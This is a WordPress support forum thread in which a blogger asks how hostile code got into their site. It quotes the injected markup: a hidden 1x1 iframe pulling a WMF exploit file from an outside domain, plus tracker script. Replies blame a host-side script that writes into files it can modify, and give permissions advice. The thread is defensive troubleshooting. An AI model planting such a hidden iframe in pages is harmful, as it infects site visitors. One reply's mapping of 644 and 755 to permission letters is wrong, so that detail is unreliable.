WordPress.org

Support

Support » How-To and Troubleshooting » How did a site write javascript to my blog?

How did a site write javascript to my blog?

  • All of a sudden, people are saying my site is giving them a virus alert, and when I view the source, I have this odd javascript on the top of the first page.

    I am looking through all the pages via the theme editor and I cannot find that to make it go away!

    help?

    <iframe src="http://www.wnplake.net/lgs/1.wmf" height=1 width=1></iframe>
    <SCRIPT language="javascript"><!--
    var tracker_loaded = 0;
    //--></SCRIPT>
    <SCRIPT language="javascript" SRC="http://www.hitscreen.com/html/tracker.js">
    </SCRIPT>
    <SCRIPT language="javascript"><!--
    if(tracker_loaded) {
    document.writeln(make_stats_now('fcep', 'http://www.hitscreen.com/cgi-bin/x.cgi'));
    };
    //--></SCRIPT>
    <SCRIPT language="javascript"><!--
    document.write("<"+"!--");
    //--></SCRIPT>
    <NOSCRIPT>
    <A HREF="http://www.hitscreen.com/" target="_top"><IMG
    SRC="http://www.hitscreen.com/cgi-bin/x.cgi?NAVG=Tracker&username=fcep" BORDER=0></A>
    </NOSCRIPT>
    <SCRIPT language="javascript"><!--
    document.write("--"+">");
    //--></SCRIPT>

Viewing 11 replies - 1 through 11 (of 11 total)
  • Mark (podz)

    @podz

    Support Maven

    I’m not seeing it.
    Check the index.php at domain root, not just the one in the themes directory.

    It’s an exploit by a script on the host server that finds writable files and puts links like this inside.
    Tell your host and if they don’t seem bothered, make plans to move to a good host.

    if you want hosting we do a free hosting plan, 25MB space, 1 SQL, a small text ad is required though, email me for more details.

    I’ve had problems with sucky hosts before, really pissed me off.

    I will have to let them know. I found the bit in the index.php.

    I’ve used esosoft since 1997 and this is the first problem! Can you believe?

    But thanks and I will email them right now.

    its all about those permissions — posts like these arent going to be to be going down in number any time soon, unfortunately.

    Actually….

    there is an exploit in Windows. (and of course, Internet Explorer!)

    Here is the security bulletin…
    http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx

    and here is the code where it snuck it in…
    <iframe src="http://www.wnplake.net/lgs/1.wmf" height=1 width=1></iframe>

    The virus comes in via that wmf file somehow. Hmmm. Not sure if I got it or they got it?

    *stabs Internet Explorer repeatedly*

    Um. This was discussed here about a week ago, with links to fixes posted. As usual, I can’t find the relevant post, since search is such a pile of you-know….

    actually, that’s old news rorie, but it simply being “out there” doesnt account for it making it onto your site.

    Thats in your permissions.

    How can I make sure my permissions are set as they should be without going through every single file and checking?

    Thanks 🙂

    Generally, your files should be 644 and your folders 755. It’s fairly easy to do a quick scan using an ftp client such as WS_FTP Pro: you’ll see in the right pane a list of your files and folders, and each will have some letters to the right of the file or folder name.

    644 = rw rw rw (or sometimes rw-rw-rw)
    755 = rws rx rx (or sometimes rwx-rx-rx)

    Thank V 🙂

    Sorry, vkaryl. I did try searching. In case anyone else reads this, it also hit the wp-blog-header.php file.

    and my permissions are all correct. 🙁

    OH! And here is the original post.
    http://wordpress.org/support/topic/54434?replies=19

    🙂 I did not know to search for wmf when I had the first error.

    Thank you, I always appreciate all the quick help here.

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘How did a site write javascript to my blog?’ is closed to new replies.